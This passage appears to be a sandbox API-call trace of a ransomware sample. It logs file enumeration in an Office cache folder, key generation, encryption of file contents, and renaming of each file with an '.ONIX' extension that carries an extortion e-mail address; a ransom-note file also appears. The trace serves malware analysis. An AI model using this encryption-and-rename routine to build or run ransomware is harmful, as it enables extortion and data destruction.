(HeapHandle=0x410000, Flags=0x0, Size=0x97f3f4) returned 0x3680020 [0088.921] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x97f3f4) returned 0x4000020 [0088.922] SetFilePointer (in: hFile=0x47c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.922] ReadFile (in: hFile=0x47c, lpBuffer=0x3680020, nNumberOfBytesToRead=0x97f3f4, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x97f3f4, lpOverlapped=0x0) returned 1 [0089.770] UnlockFile (hFile=0x47c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x97f3f4, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0089.770] CloseHandle (hObject=0x47c) returned 1 [0090.033] GetProcessHeap () returned 0x410000 [0090.033] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0090.033] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0090.035] GetProcessHeap () returned 0x410000 [0090.035] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0090.035] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0090.036] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0090.036] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0090.036] FindNextFileW (in: hFindFile=0x48e970, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0090.036] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0090.036] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0090.036] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458390 [0090.036] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0090.036] GetLastError () returned 0x0 [0090.036] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x47c [0090.036] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0090.036] LockFile (hFile=0x47c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x648, nNumberOfBytesToLockHigh=0x0) returned 1 [0090.036] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.037] ReadFile (in: hFile=0x47c, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0090.039] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.039] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.039] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0090.039] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0090.039] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0090.039] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0090.039] GetProcessHeap () returned 0x410000 [0090.039] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x102) returned 0x467908 [0090.039] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" [0090.039] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0090.039] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1608) returned 1 [0090.039] SetFilePointer (in: hFile=0x47c, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x648 [0090.039] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0090.039] GetProcessHeap () returned 0x410000 [0090.039] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0090.039] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0090.040] WriteFile (in: hFile=0x47c, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0090.042] WriteFile (in: hFile=0x47c, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0090.043] WriteFile (in: hFile=0x47c, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0090.044] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x648) returned 0x4b5b28 [0090.044] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x648) returned 0x4b6178 [0090.044] SetFilePointer (in: hFile=0x47c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.044] ReadFile (in: hFile=0x47c, lpBuffer=0x4b5b28, nNumberOfBytesToRead=0x648, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b5b28*, lpNumberOfBytesRead=0x367f44c*=0x648, lpOverlapped=0x0) returned 1 [0090.044] SetFilePointer (in: hFile=0x47c, lDistanceToMove=-1608, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.044] WriteFile (in: hFile=0x47c, lpBuffer=0x4b6178*, nNumberOfBytesToWrite=0x648, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b6178*, lpNumberOfBytesWritten=0x367f44c*=0x648, lpOverlapped=0x0) returned 1 [0090.046] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b5b28 | out: hHeap=0x410000) returned 1 [0090.046] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b6178 | out: hHeap=0x410000) returned 1 [0090.046] UnlockFile (hFile=0x47c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x648, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0090.046] CloseHandle (hObject=0x47c) returned 1 [0090.047] GetProcessHeap () returned 0x410000 [0090.047] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0090.048] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0090.050] GetProcessHeap () returned 0x410000 [0090.050] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0090.050] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0090.050] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0090.050] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0090.050] FindNextFileW (in: hFindFile=0x48e970, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30bcff70, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30bcff70, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30bcff70, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0090.050] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0090.050] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0090.050] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458390 [0090.050] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0090.050] GetLastError () returned 0x0 [0090.050] FindNextFileW (in: hFindFile=0x48e970, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30bcff70, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30bcff70, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30bcff70, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0090.050] CloseHandle (hObject=0x3cc) returned 1 [0090.050] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0090.050] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x1d, wMilliseconds=0x21d)) [0090.050] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0090.051] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0090.051] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0090.051] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C9c354ca09c354b444c.lock") returned 86 [0090.051] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C9c354ca09c354b444c.lock" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0090.051] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.051] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.052] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x460008 [0090.052] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0090.052] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458418 | out: hHeap=0x410000) returned 1 [0090.052] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472028 | out: hHeap=0x410000) returned 1 [0090.052] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x30bf60d0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30bf60d0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48e9b0 [0090.052] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0090.052] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0090.052] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458418 [0090.052] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0090.052] GetLastError () returned 0x0 [0090.052] FindNextFileW (in: hFindFile=0x48e9b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x30bf60d0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30bf60d0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.052] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0090.052] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0090.052] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458418 [0090.052] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0090.052] GetLastError () returned 0x0 [0090.052] FindNextFileW (in: hFindFile=0x48e9b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3a6f2400, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3a6f2400, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xeebe0180, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe21fcc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OutlkLR.cab", cAlternateFileName="")) returned 1 [0090.052] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0090.052] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0090.052] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458418 [0090.052] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0090.052] GetLastError () returned 0x0 [0090.052] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x480 [0090.053] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0090.053] LockFile (hFile=0x480, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xe21fcc, nNumberOfBytesToLockHigh=0x0) returned 1 [0090.053] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.053] ReadFile (in: hFile=0x480, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0090.058] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.058] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.059] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0090.059] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0090.059] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", dwFileAttributes=0x80) returned 1 [0090.059] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 75 [0090.059] GetProcessHeap () returned 0x410000 [0090.059] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x106) returned 0x467908 [0090.059] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" [0090.059] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0090.059] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=14819276) returned 1 [0090.059] SetFilePointer (in: hFile=0x480, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xe21fcc [0090.059] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0090.059] GetProcessHeap () returned 0x410000 [0090.059] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0090.059] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0090.059] WriteFile (in: hFile=0x480, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0090.063] WriteFile (in: hFile=0x480, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0090.064] WriteFile (in: hFile=0x480, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0090.065] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe21fcc) returned 0x3680020 [0090.066] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe21fcc) returned 0x44b0020 [0090.067] SetFilePointer (in: hFile=0x480, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.067] ReadFile (in: hFile=0x480, lpBuffer=0x3680020, nNumberOfBytesToRead=0xe21fcc, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0xe21fcc, lpOverlapped=0x0) returned 1 [0091.163] UnlockFile (hFile=0x480, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xe21fcc, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0091.163] CloseHandle (hObject=0x480) returned 1 [0091.430] GetProcessHeap () returned 0x410000 [0091.430] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0091.430] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0091.432] GetProcessHeap () returned 0x410000 [0091.432] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0091.432] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0091.432] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0091.432] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0091.432] FindNextFileW (in: hFindFile=0x48e9b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2bba00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OutlookMUI.msi", cAlternateFileName="OUTLOO~1.MSI")) returned 1 [0091.432] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0091.433] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0091.433] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458418 [0091.433] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0091.433] GetLastError () returned 0x0 [0091.433] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x480 [0091.433] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0091.433] LockFile (hFile=0x480, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x2bba00, nNumberOfBytesToLockHigh=0x0) returned 1 [0091.433] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.433] ReadFile (in: hFile=0x480, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0091.435] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.435] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.436] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0091.436] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0091.436] 